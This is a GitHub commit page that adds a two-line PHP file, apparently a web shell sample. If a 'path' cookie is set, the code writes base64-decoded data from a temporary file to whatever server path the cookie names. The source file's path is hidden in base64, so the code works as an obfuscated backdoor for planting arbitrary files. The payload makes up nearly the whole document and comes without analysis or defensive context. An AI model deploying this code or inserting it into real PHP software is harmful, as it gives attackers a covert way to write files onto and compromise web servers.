Create 20220213_04.php

This commit is contained in:
tennc 2022-02-13 22:33:58 +08:00 committed by GitHub
parent b9f06d9682
commit 9640d18e26
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

2
php/20220213_04.php Normal file
View file

@ -0,0 +1,2 @@
<?php
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}